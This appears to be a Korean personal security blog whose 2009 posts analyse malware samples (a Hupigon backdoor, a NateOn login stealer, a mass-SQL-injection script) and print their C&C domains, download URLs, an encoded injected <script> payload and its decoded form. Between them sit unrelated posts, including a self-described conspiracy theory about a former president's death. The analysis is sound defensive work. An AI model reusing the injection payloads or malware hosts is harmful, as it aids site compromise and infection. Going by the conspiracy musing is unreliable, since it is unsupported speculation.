malwareL4B

허니넷 Dropper에서 획득한 파일에 대한 분석입니다.

획득한 파일의 파일 사이즈와 md5sum입니다.

File size : 552,960 byte
md5sum : 49a84bd7144ae8384b9fb2e01572f2ad

해당 파일 실행시 파일을 1개 생성하고 1개를 삭제하며 서비스를 1개 등록합니다.

삭제된 파일인 ieapfltr.dat는 피싱필터에 사용되는 파일이었습니다.

새롭게 생성되는 amdcpusetup.exe 파일은 원본 파일과 동일한 파일이었고 이 파일을 통해서 LanmandeQorkstation 서비스가 구동되고 있었습니다.

원본 파일과 동일한 사이즈를 가지고 있었으며 md5sum값도 동일하였습니다.
그리고 해당 파일은 LanmandeQorkstation 서비스를 구동하는 실행파일이었습니다.

그리고 해당 파일 실행 후 파일을 생성하고 서비스를 등록한 후에는 iexplorer 프로세스를 실행하여 www.gaogm.com으로 연결하고 있었습니다.

www.gaogm.com으로 접속한 후 ok.jpg 파일을 받는데 ok.jpg 파일은 이미지 파일이 아니고 아래 내용이 있었습니다.

http://61.131.15.131:8000/www/root/

처음에는 www.gaogm.com의 80번 포트로 연결을 하고 ok.jpg 파일을 다운 받은 후 8000번 포트로 연결하는 것을 확인하실 수 있습니다.
8000번 포트로 연결 후에는 클라이언트가 서버(www.gaogm.com)으로 자신의 운영체제 정보를 전송하고 있습니다.

Windows XP 5.1 (2600.Service Pack 3)............GUOCYOK88.....GUOC..

(중간에 일부 쓸데 없는 글자는 삭제하였습니다.)

8000번으로 접속 후 운영체제 정보를 전송하는 것으로 보아 www.gaogm.com 도메인은 C&C인 것으로 판단됩니다.
netbot과 같은 악성코드들에 감염된 PC들도 C&C 서버로 접속시 자신의 운영체제 정보를 전송하고 있었기 때문입니다.
확실한건 아니지만 지금까지 나왔던 패턴으로 보아 C&C일 가능성이 가장 큽니다.

그리고 V3나 Virobot, nProtect에서는 아직 탐지되지 않고 있었습니다.

안티바이러스	엔진 버전	정의 날짜	검사 결과
a-squared	4.0.0.101	2009.05.25	Backdoor.Win32.Hupigon!IK
AhnLab-V3	5.0.0.2	2009.05.25	-
AntiVir	7.9.0.168	2009.05.24	BDS/Hupigon.Gen
Antiy-AVL	2.0.3.1	2009.05.22	-
Authentium	5.1.2.4	2009.05.24	W32/Hupigon.K.gen!Eldorado
Avast	4.8.1335.0	2009.05.24	-
AVG	8.5.0.339	2009.05.24	BackDoor.Hupigon5.GHS
BitDefender	7.2	2009.05.25	Backdoor.Hupigon.AAFC
CAT-QuickHeal	10.00	2009.05.23	(Suspicious) - DNAScan
ClamAV	0.94.1	2009.05.24	-
Comodo	1157	2009.05.08	-
DrWeb	5.0.0.12182	2009.05.24	BackDoor.Pigeon.15147
eSafe	7.0.17.0	2009.05.24	-
eTrust-Vet	31.6.6519	2009.05.23	-
F-Prot	4.4.4.56	2009.05.24	W32/Hupigon.K.gen!Eldorado
F-Secure	8.0.14470.0	2009.05.25	-
Fortinet	3.117.0.0	2009.05.25	-
GData	19	2009.05.25	Backdoor.Hupigon.AAFC
Ikarus	T3.1.1.49.0	2009.05.25	Backdoor.Win32.Hupigon
K7AntiVirus	7.10.741	2009.05.21	-
Kaspersky	7.0.0.125	2009.05.25	-
McAfee	5625	2009.05.24	New Malware.ix
McAfee+Artemis	5625	2009.05.24	New Malware.ix
McAfee-GW-Edition	6.7.6	2009.05.24	Trojan.Backdoor.Hupigon.Gen
Microsoft	1.4701	2009.05.24	Backdoor:Win32/Hupigon.gen!B
NOD32	4099	2009.05.25	-
Norman	6.01.05	2009.05.22	-
nProtect	2009.1.8.0	2009.05.24	-
Panda	10.0.0.14	2009.05.24	Suspicious file
PCTools	4.4.2.0	2009.05.21	-
Prevx	3.0	2009.05.25	-
Rising	21.31.00.00	2009.05.25	Backdoor.Win32.Gpigeon2008.cch
Sophos	4.42.0	2009.05.25	-
Sunbelt	3.2.1858.2	2009.05.24	VIPRE.Suspicious
Symantec	1.4.4.12	2009.05.25	-
TheHacker	6.3.4.3.331	2009.05.25	-
TrendMicro	8.950.0.1092	2009.05.25	-
VBA32	3.12.10.5	2009.05.25	OScope.Backdoor.Hupigon.axbr
ViRobot	2009.5.25.1750	2009.05.25	-
VirusBuster	4.6.5.0	2009.05.24	-

바이러스랩님께 파일 전달했으니 nProtect는 조만간 패턴 업데이트될겁니다.

지극히 개인적인 생각을 적을것입니다.

저는 '체 게바라'라는 인물을 좋아하는 대한민국 사람입니다.
마르크스주의에 대해 관심을 가지고 있으며 전태일이라는 청년의 죽음을 너무도 원통하게 생각하며
유신정권의 박정희를 1980년 5월 광주 시민을 무찬히 짓밟았던 전두환을 너무도 싫어하는
대한민국 한 가정의 가장이자 대한민국 국민입니다.

얼마전 읽었던 바보사(바로 보는 우리 역사)에서 1945년 해방 이후의 우리 근현대사를 가장 인상 깊게 읽었습니다.
역사학연구소에서 책을 집필하였기에 충분히 신빙성이 있으리라 생각하고 읽었습니다.
책을 집필하신분들이 좌파적인 성향이 강하신 듯 했습니다.
정치적인 것보다는 민중을 통한 민중에 의한 개혁이나 혁명이 가장 중요하고
민중을 생각하지 않는 개혁은 이루어질 수 없다...라는 결론도 나오고 있었습니다.



노무현 전 대통령 서거에 관련된 글을 몇자 끄적이고자 하는데 좌파가 왜 나오냐...하시는 분들 있으실 겁니다.

하지만 전혀 상관이 없다고 생각지 않습니다.
아시다시피 노무현 전 대통령은 인권 변호사를 지내시기도 하셨었습니다.



6월 항쟁때에도 민중의 편에서 정치권에 칼날을 들이대보긴 했지만 힘이 부족하였지요..

비리때문에 퇴임 후에 언론에 자주 나오시는게 참 안타까웠습니다.
정치인이라는 족속들을 별로 좋아하진 않지만 그나마 나은 사람이라 생각했었는데
내가 사람을 잘못 본 것인가...하는 생각도 들었습니다.

하지만 노무현 전 대통령이 저지른 비리는 박정희나 전두환이나 김영삼이 저지른 비리나 악행에 비하면 너무나 초라합니다.
29만원 운운하며 아직도 경호원들에 둘러싸여 목숨을 연명하는 누구에 비하면 너무나 대조적이지 않을 수 없습니다.

말을 좀 막 하시긴 했습니다.
하지만 국민들을 가장 많이 생각했던 대통령이 아닌가 생각됩니다.


이제 개인적인 음모론(?)을 하나 만들어 볼까 합니다.
사실과 다를 수 있습니다.


등산때 같이 동행했던 경호원이 노무현 전 대통령의 직속 경호원이 아닌 청와대 파견 경호원이었다는데
원래 퇴임한 대통령의 경호원은 재임시절 경호원들이 하는게 맞는걸로 알고 있습니다.
(그러니 전**는 아직도 잘 먹고 잘 살고 있지 않습니까..)

그리고 왜 유서가 컴퓨터 파일로 작성되었는가...
자필이 아니면 법적효력을 갖지 못한다는 것을 알고 있는 변호사 출신의 대통령이 왜 컴퓨터 파일로 유서를 작성했는가...

그 외에도 의문점이 많습니다만 전 여기까지만 보더라도 타살일 가능성을 전혀 배제할 수 없다고 봅니다.

물론 누가 사주했는지는 아무도 모를 일이지요..
그리고 투신을 했는지 안했는지도 고인이 되신 노무현 전 대통령만 알 일이지만 죽은자는 말이 없지 않습니까..

만약 타살이라는 증거가 나온다면 대한민국 사회에 아주 큰 영향을 미치지 않을까 생각됩니다.
아마 아주 큰 핵폭풍이 불어 닥치겠지만
그럴 가능성은 1% 정도밖에 되지 않는다고 생각됩니다.

국민의 눈과 귀와 입을 막기 위해 폭력을 행사하고
국민의 생각을 조정하려 언론 장악을 하려하는 공권력에게 그리고 검찰에게
더 이상 바랄게 없다고 봅니다.





개인적인 생각만 쓴 두서없는 글이었습니다.
뭔가 머리 속에서 막 맴돌고는 있지만 입으로 내뱉기에 글로 풀어나가기엔 너무 씁쓸한 이야기가 되지 않을까 싶엇
여기서 접을려고 합니다.



부디 편한 곳으로 가셨으면 하는 바램입니다.

댓글로 문의하시는분들도 계시고 유입 키워드에도 ywulin.dll로 검색해서 제 블로그에 들어 오신 분들이 많으셔서
해당 악성코드를 삭제하는 방법을 알려드리도록 하겠습니다.
아무쪼록 도움이 되었으면 합니다.

먼저 Process Explorer를 다운 받습니다.

압축을 풀고 실행을 시키시면 다음과 같은 화면이 나올겁니다.(화면 구성에 약간의 차이는 있을 수 있습니다)

Ctrl+F를 누르시거나 메뉴바쪽에 잇는 망원경 표시를 누르시면 검색을 하실 수 있습니다.

검색 문자열에 ywulin.dll을 입력하고 검색을 하면 아래쪽에 NateOnMain.exe라는 프로세스 이름이 나오고
Handle or DLL쪽에 ywulin.dll 파일명이 보이실 겁니다.
해당 프로세스를 클릭하시면 현재 뒤쪽에 있는 Process Explorer에 표시가 될 것이고 아래쪽 창에 C:\WINDOWS\system32\ywulin.dll가 보이실겁니다.

아래쪽에 악성코드 파일명에 마우스 오른쪽 클릭을 하신 후 Close Handle을 클릭하시면 해당 악성코드 핸들이 닫힙니다.

이전까지는 삭제가 안되시던 ywulin.dll 파일이 핸들을 닫고 나면 삭제가 됩니다.




그리고 사용하시는 백신 프로그램을 업데이트하시고 정밀검사도 한번 하실것을 권장합니다.
백신업데이트는 항상 자동으로 되도록 하시는게 좋습니다.

Viruslab님의 블로그에 올라온 [Nateon]네이트온 쪽지로 신종 악성코드 유포 중 이라는 글을 보고
어...이거 본 적 있는데....하고 뒤져보니 10일 전에 회사에서 분석보고서를 썼더군요 ^^;
그때 제가 가지고 있었던 정보는 단지 도메인뿐이었습니다.
그래서 Viruslab님의 분석 글과는 약간의 차이가 있을 수 있습니다.

일단 제가 분석을 한 도메인은 www.nouydds.com 이었습니다.
해당 도메인에 접속시 www.tw-nsn.com/gif/jpg.scr로 리다이렉션 되면서 jpg.scr을 다운 받을 수 있었습니다.

특정 취약점을 공격하면 바로 실행시킬 수 있겠죠..

항상 하던 방식대로 일단 실행시켜보니 파일을 6개 생성하였고 그 중에서 5개가 실제 감염된 PC에 영향을 미치는 것으로 보입니다.

새로 생성된 파일들은 시스템 속성(S)과 숨김속성(H)을 가지고 있었습니다.
이 중 hf0214.exe와 hf0214.dll은 상당히 눈에 익었던 녀석들인데 어떤 기능을 하는 녀석들인지는 까먹었습니다. -_-;;
아무튼 hf0214.exe는 레지스트리에 등록되어 있어 재부팅시에도 실행되게끔 되어 있었습니다.

Process Explorer에서 hf0214.dll을 확인해 본 결과 현재 실행되고 있는 주요 프로세스에 인젝션되어 실행되고 있었습니다.

hf0214.dll에서 문자열만 추출해 봤더니 메이플스토리, 바람의 나라 등 게임 프로그램과 Internet Explorer를 후킹하는 듯 보였고
이렇게 후킹하여 가로챈 데이터를 HTTP를 통해서 어떤 데이터를 보내기 위한 함수들도 보였습니다.

         

단지 추측에 지나지 않을 수 있지만 URL에 특정 파라미터들이 오는지도 확인하는 듯 보입니다.

그리고 네이트온과 관계가 있어 보이는 악성코드인 ywulin.dll은 NateOnMain.exe 파일에 인젝션되어 동작하고 있었으며
네이트온 로그인시 로그인 정보를 후킹하여 특정 사이트로 전송하고 있었습니다.

후킹 함수와 URL을 오픈하는 함수가 보입니다.

이상한 URL이 보입니다.

실제로 네이트온에 가짜 계정 정보를 입력해보니 www.xdqxzq.com으로 계정 정보를 보내고 있었습니다.

결국 www.nouydds.com, tw-nsn.com, www.xdqxzq.com 모두 악성사이트라고 판단되어 모두 차단하였는데(모두 중국 IP)

URL을 변경하면서 계속 유포되고 있다고 하니 각별히 주의를 기울이셔야 할 듯 합니다.

아쉽게도 샘플파일이 없어져버려서 Virustotal에는 올려보지 못했지만 대부분 백신업체들이 해당 악성코드에 대한 패턴을 업데이트했으리라 봅니다.

바이러스랩님께서 분석글을 올리신걸 보면 nProtect는 업데이트된 듯 하구요...

새로운(?) 도메인을 알게 되서 포스팅합니다.
hapt03.cn은 이미 잘 알려져 있는 듯 한데 국내에서는 아직인 듯 합니다.
FF로 해당 사이트에 웹으로 접속하면 경고 메시지가 뜹니다.

해당 사이트에 접속시엔 500 Internal Server Error가 나옵니다. 하지만 해당 디렉토리에는 몇개의 파일이 있는 듯 한데
그중에서 하나의 파일을 찾았습니다.

hxxp://shaody.1.jp.hapt03.cn/hack.exe

해당 파일을 다운 받으면 Antivir에서 악성코드라고 잡더군요..
바이러스토탈에 넣어 봤더니 40개 엔진중 18개에서만 탐지가 되고 있었습니다.
V3와 nProtect에서는 탐지가 되고 있었으며 바이로봇에서는 아직 탐지하지 못하는 듯 합니다.
헌데 바이로봇은 15일자 엔진으로 검색하는걸 보니 엔진 업데이트 후 탐지할 가능성도 있습니다.


일단 항상 하던대로 실행시켜보았습니다.

nvhai520.3322.org의 8800번 포트로 접속하는 것을 볼 수 있습니다. 아직도 3322.org는 애용되고 있군요...-_-;;

Winalysis에서 시스템의 변화를 살펴보니 역시나 레지스트리를 여러개 변경하였고 서비스를 하나 등록하는걸 확인하였습니다.
헌데 파일에는 변화가 없다고 나오지만 실제로 살펴보면 svchost.exe에 dll injection을 하고 있었습니다.




시간을 보시면 파일을 실행했던 시간이 나오고 있습니다. 이름부터 좀 이상하죠.. fakqvekk.dll
그리고 해당 프로세스가 nvhai520.3322.org(59.34.245.21)로 접속하는 걸 볼 수 있습니다.

도메인명이 좀 다른데 Reverse-Lookup을 해서 가져온 도메인이 원 도메인명과 약간 다른 듯 합니다.
아무튼 fakqvekk.dll이라는 파일은 새로 생성된 파일인데도 Winalysis에서 못 잡네요...
파일명은 랜덤으로 생성되는 것으로 보입니다.

그리고 다른 악성코드들과는 좀 다르게 C:\WINDOWS\ssytem32에 파일을 생성하는 것이 아니라
C:\WINDOWS\system32\drivers\etc에 생성하고 있었습니다.
그리고 특이한점은 kTGsJaDDRj.ini라는 파일을 생성한 것인데 파일엔 아무런 내용도 없었는데 파일의 크기는 3바이트였습니다.
그래서 데이터 스트림이 있는건 아닐까 하고 lads로 검사해봤지만 데이터 스트림이 숨겨져 있지는 않았습니다.

lads : http://www.heysoft.de/Frames/f_sw_la_en.htm



결국 shaody.1.jp.hapt03.cn은 Dropper임을 확인할 수 있었고 다운 받은 hack.exe라는 파일이 실행되면
nvhai520.3322.org의 8800번 포트로 연결하는 것으로 보아 nvhai520.3322.org는 C&C인 듯 합니다.

뭐...3322.org 자체가 대부분의 ISP에서 차단되어 있기 때문에 큰 영향력을 미치지는 않을 듯 합니다만
동일한 악성코드가 도메인을 바꾸거나 IP로 접속하게 할 경우엔 봇으로 동작할 우려가 아직 남아 있습니다.

오랜만에 글 써봅니다. ^^; 
그 동안 잠심 다른 업무를 좀 하느라...
그럼 몇일전 WAF에서 발견된 악성스크립트 분석해보겠습니다.

MASS SQL Injection을 시도가 있었고 로그를 분석한 결과 삽입될 URL부분만 인코딩되어 있었습니다.

%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%76%61%76%61%74%69%6F%6E%2E%35  %39%34%34%76%2E%6E%65%74%2F%62%62%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E

인코딩된 부분을 디코딩하면 다음과 같습니다.

<script src="hxxp://vavation.5944v.net/bb.js"></script>

위 도메인은 처음보는 도메인인데 앞으로 어떤 추이가 나올지 궁금합니다.

일단 bb.js를 열어보면 같은 위치에서 bb.htm 파일을 iframe으로 삽입시켰습니다. 당연히 width와 height는 0입니다.

bb.htm에서 약간 이상한 부분이 있었습니다.
다른 사람이 확인했을 때는 분명 실행파일에 대한 링크가 있었는데 제가 확인했을 땐 없었습니다.
제가 확인한 페이지는 이렇습니다.

js.users.51.la/2618220.js를 불러 오기는 하는데 특별한 내용은 없었습니다만 js.user.51.la라는 도메인은 악성코드 유포로 유명했던 도메인이라 조금 꺼림직하긴 합니다.

먼저 분석했던 직원에 의해 발견된 bb.htm에서는 hxxp://vavation.5944v.net/1.exe 을 포함하고 있었습니다. 아마도 제가 뭔가 잘못한게 아닌가 생각되지만 어디서 어떻게 잘못한건지 감을 못 잡고 있습니다. -_-;;
그래서 그냥 직접 받아 보았습니다. 파일 속성만 살펴보아도 짱개 프로그램이라는게 눈에 확 들어옵니다.

Winalysis로 스냅샷 찍고 파일을 실행해보았습니다.
파일이 2개, 레지스트리 여러개, 서비스 1개가 변경되었습니다. 그 중에서 레지스트리를 보시면

파일 2개는 drivers 폴더에 대한 변경 하나와 C:\WINDOWS\Systear.exe 두개입니다. 이 파일이 SYS라는 서비스를 실행하는 파일입니다.
그런데 확인 결과 서비스가 실행되지는 않은 것처럼 보이는데 실제로는 서비스가 실행되지 않은게 아니라
서비스를 실행시키면 Systear.exe가 실행되고 이 파일이 svchost.exe를 실행시키고 특정 도메인으로 접속하게 만듭니다.
그리고 Systear.exe 프로세스는 사라지고 서비스에서도 시작되지 않은 것처럼 보이는 것이죠.

파일 실행시 패킷을 떠보니 11826.rhelper.com으로 질의를 한 후 1600번 포트로 연결을 합니다.

1번에서 11826.rhelper.com으로 질의해서 222.131.44.225를 받아오고
2번에서 222.131.44.225로 3-way handshaking을 거쳐 접속을 합니다.
그리고 3번에서 서로 어떤 데이터를 주고 받습니다.

보여드리고 싶었는데...pcap 파일을 날려 먹었습니다. -_-;;
현재는 연결이 안되고 있습니다. ㅜ.ㅜ
pcap 데이터 확보되면 수정하겠습니다.


rhelper.com으로 구글에서 검색한 결과 다수의 악성코드들이 존재하는 것을 확인할 수 있었습니다.
19167.rhelper.com  63540.rhelper.com  62869.rhelper.com  등등 여러가지 있습니다.

악성코드가 실행된 후 11826.rhelper.com으로 연결하는걸로 봐서는 11826.rhelper.com 도메인이
공격자가 좀비들에게 명령을 내리는 C&C 서버일 가능성이 높아 보입니다.

추가적인 위험성이 존재할 수 있기 때문에 위에서 살펴 보았던
vavation.5944v.net과 11826.rhelper.com 도메인은 차단하는 것이 좋을 듯 합니다.

그리고 현재시간으로 VIRUSTOTAL에서 확인 결과 V3에서는 잡고 있지만 nProtect나 Virobot, BitDefender(알약에서 사용하는 엔진) 등은 해당 악성코드를 잡아내지 못하고 있다. 본인은 AntiVir를 사용하고 있는데 AntiVir는 잘 잡아내고 있다.

안티바이러스	엔진 버전	정의 날짜	검사 결과
a-squared	4.0.0.101	2009.05.04	Trojan.Crypt!IK
AhnLab-V3	5.0.0.2	2009.05.04	Win-Trojan/Xema.variant
AntiVir	7.9.0.160	2009.05.04	TR/Crypt.ZPACK.Gen
Antiy-AVL	2.0.3.1	2009.04.30	-
Authentium	5.1.2.4	2009.05.04	W32/Fujack.U
Avast	4.8.1335.0	2009.05.04	-
AVG	8.5.0.327	2009.05.04	Win32/Heur
BitDefender	7.2	2009.05.04	-
CAT-QuickHeal	10.00	2009.05.04	-
ClamAV	0.94.1	2009.05.04	-
Comodo	1149	2009.05.03	-
DrWeb	4.44.0.09170	2009.05.04	-
eSafe	7.0.17.0	2009.05.03	Win32.TRCrypt.ZPACK
eTrust-Vet	31.6.6488	2009.05.04	-
F-Prot	4.4.4.56	2009.05.04	W32/Fujack.U
F-Secure	8.0.14470.0	2009.05.04	-
Fortinet	3.117.0.0	2009.05.04	PossibleThreat
GData	19	2009.05.04	-
Ikarus	T3.1.1.49.0	2009.05.04	Trojan.Crypt
K7AntiVirus	7.10.723	2009.05.04	Trojan.Win32.Malware.1
Kaspersky	7.0.0.125	2009.05.04	-
McAfee	5605	2009.05.04	New Malware.ix
McAfee+Artemis	5605	2009.05.04	Artemis!2046A24FF3F8
McAfee-GW-Edition	6.7.6	2009.05.04	Trojan.Crypt.ZPACK.Gen
Microsoft	1.4602	2009.05.04	-
NOD32	4052	2009.05.04	Win32/Fujacks
Norman	6.01.05	2009.05.04	Fujack.T
nProtect	2009.1.8.0	2009.05.04	-
Panda	10.0.0.14	2009.05.04	Suspicious file
PCTools	4.4.2.0	2009.05.03	-
Prevx1	3.0	2009.05.04	-
Rising	21.28.04.00	2009.05.04	-
Sophos	4.41.0	2009.05.04	Mal/UnkPack-Fam
Sunbelt	3.2.1858.2	2009.05.03	-
Symantec	1.4.4.12	2009.05.04	-
TheHacker	6.3.4.1.318	2009.05.04	-
TrendMicro	8.950.0.1092	2009.05.04	-
VBA32	3.12.10.4	2009.05.04	-
ViRobot	2009.5.4.1719	2009.05.04	-
VirusBuster	4.6.5.0	2009.05.04	-

 

---

내일은...아니 오늘은 어린이날이군요...
아들래미랑 신나게 놓아줘야겠군요...
아침에 좀 늦게 일어날 듯 하지만요...^^;

앞으로는 자주 포스팅할 수 있도록 노력하겠습니다.

한 명 또는 두 명 정도 있으실걸로 생각됩니다.
저도 한 명 있었는데 몇 일 전 두 명으로 늘었습니다. ^^

아시는분들은 아시겠지만 2006년 여름 페루의 여행에서 전 많은걸 잃었고 소중한 하나를 얻었습니다.
강도를 만나 현금 700달러와 카메라 두대(ㅜ.ㅜ), 여권, 여행일지 등등 많은 걸 강탈 당했고
이 사건으로 인해 윌슨이라는 친구를 얻게 되었습니다.

정식 이름은 Wilson Hernández Breña 입니다.
사진이 좀 어둡게 나와서 그런데 참 잘생긴 친구죠..
4일 동안 저에게 숙식을 제공해줬었고 한국대사관에 가서 임시여권 발급 받는 것도 도와주고
여러가지로 참 많은 도움을 받았었죠..

한국에 돌아온 후 계속 메일로 서로의 소식을 주고 받다가
최근엔 윌슨의 여자친구가 한국에 업무차 방문을 하니 만나보라고 하더군요..
둘만 만나기 뻘쭘해서 각자 친구 한명씩 데리고 나오기로 했죠..^^;

태권도가 취미인건 알았는데 무슨 일 하는지 참 궁금했는데
알고보니 한국-페루 FTA 협상하러 온 협상단이더군요..외교부 소속인거죠...^^;
아...윌슨 여자친구 이름은 사유리입니다. 어머니가 일본인이시라네요..
사유리와 같이 나온 친구분도 외교통상부 소속...-_-;;

사유리 친구 덕분에 대화가 매끄러웠습니다.
4개국어를 하는 분은 실제로 첨 만나봤는데 좀...부럽더군요...

사유리 디카로 같이 찍은 사진이 있는데 아직 받질 못했습니다.
한국 협상 후엔 일본으로 간다더니 좀 바쁜가 봅니다.
사진 받는데로 추가하도록 하겠습니다.

이번이 1차 협상이라 아마도 또 오지 않을까 생각되는데 그땐 윌슨도 같이 올 가능성이 있다더군요..
지인들에게 항상하는 이야기지만 윌슨이 한국에 온다면 무급휴가라도 내서 여기저기 같이 돌아다니고
이번엔 제가 대접을 해주고 싶습니다.

윌슨이 없었다면 이런 글도 못 썼을 수도 있겠죠..

외국인친구라는게 중요한게 아니라
누군가 내가 도움을 줄 수 있는 도움을 주고 싶은
나에게 도움을 주고 도움을 줄 수 있는
그런 마음이 중요한 것 같습니다.




p.s 꼬꼬의 닭한마리 메뉴 선택도 참 좋았습니다. ^^


--------------------------------------------------------------------------------

사유리가 많이 바쁜가 봅니다.
윌슨을 통해서 사유리와 만났던 날의 사진을 받았습니다. ^^

왼쪽부터 사유리, 저, 꼬꼬, 서원씨




여기에 윌슨까지 함께 볼 수 있는 날이 올거라 믿습니다.

<raqmtr$r{c<jwpt<+.z1/absnd*bfm.hs*nu:=&sbpjtp8



이 녀석이죠.. 기억나시죠?
전 그때 좀 보다가 당췌 무슨말인지 이해할 수가 없어서 그냥 지나갔었는데 이 글을 보고 계신 고수님들께서는 해석해 보신 분들이 있지 않을까 생각됩니다.

좀 늦은감이 없지 않아 있지만 갑자기 생각나서 검색 들어갔습니다.
대부분의 Injection된 사이트들의 링크가 나오고 Viruslab님과 My Hacked Story님의 블로그에서 간단하게 소개 정도만 나왔습니다.
그래서 검색된 사이트 전부 뒤지다보니 일본 사이트가 나오더군요..

http://d.hatena.ne.jp/hasegawayosuke/20090116/p1

번역기를 돌려 대충 문맥만 이해해봤습니다.
이 사이트에서는 추측으로 악성스크립트 형태를 만들어 내고 있었는데


대부분의 악성코드들이 <script src= 이라는 형태로 시작하기에 위와 같은 추측을 했답니다.
그리고 마지막은 ></script> 형태를 띄게 되죠..
영문자는 영문자로 기호는 기호로 변환된다는 생각을 했다고 합니다.


글자수도 일치합니다...우연의 일치인지...
이 상황에서 기호를 기호로 추측해서 변환을 해보면


이렇게 나온답니다.
왠지 그럴싸하게 맞아 들어가지 않나요? ㅎㅎ

마지막에 보니(번역기 돌린 후에) 이런 말이 번역되어 있었습니다.

"회답 나왔다."

누군가 해석을 했다는 의미인 듯 합니다.
그래서 링크를 따라가 보았습니다. 세개의 링크가 있었는데 그 중 가장 인상 깊었던 링크만 정리해 보겠습니다.

http://d.hatena.ne.jp/callee/20090116/p1

이 블로그에서는 XOR 연산을 염두에 두고 있었습니다. 재미있는건 이 암호(?)를 해독하기 위해 perl로 간단한 스크립트를 짰다는 것입니다.



원문에서는 링크가 되는게 싫어서 도메인명에 '.' 대신 '_'를 붙였다고 했는데 전 '.'을 넣어서 스크립트를 실행했습니다.
그리고 원문에서는 '0123446419'의 반복 패턴으로 XOR을 취하는 듯 하다고 합니다.
실제로 위 스크립트를 실행해보면 다음과 같은 결과가 나옵니다.



모두 똑같은 결과가 나왔습니다!!




개인적인 생각이긴 하지만 누군가 자기만의 암호화 법칙을 <script src=http://s1.cawjb.com/kr.js></script> 에 적용시켜

SQL Injection을 수행한게 아닌가 생각됩니다. 물론 그냥 심심해서...ㅎㅎ

이상한걸 온라인에 잠깐 퍼트려서 사람들의 궁금증을 유발시켜 도전해 볼 수 있는 그런 챌린지 문제가 아닌가 하는 생각도 들구요..



간만에 재미있는 녀석 봤습니다.

앞에서도 말씀드렸지만 제가 해석한게 아니고 일본사람이 해석한 걸 그냥 옮겼을 뿐입니다. ^^;



이제 회식자리에 가야겠습니다. ㅎㅎ

http://labs.idefense.com/software/malcode.php


악성코드분석에 너무나도 유명한 프로그램인 SysAnlyzer를 만든 David Zimmer가 속한 iDefenseLab의 막성코드분석 툴입니다.

SysAnlyzer 외에도 Malcode Analysis Pack, HookExplorer, Multipot 등의 툴이 있습니다.

특히 Malcode Analysis Pack이란 놈이 맘에 듭니다.

Shell Extension 기능이 있는데 Strings, Hash Files, Decompile, MD5 Hash 기능이 마우스 오른쪽 클릭으로 가능합니다.




지금 IRTK(Insident Response ToolKit)라는 이름으로 분석 툴킷을 만들어 볼까 하는데

요놈도 선정 대상 리스트에 올려야겠습니다.




IRTK....
이름만 거창합니다. -_-;;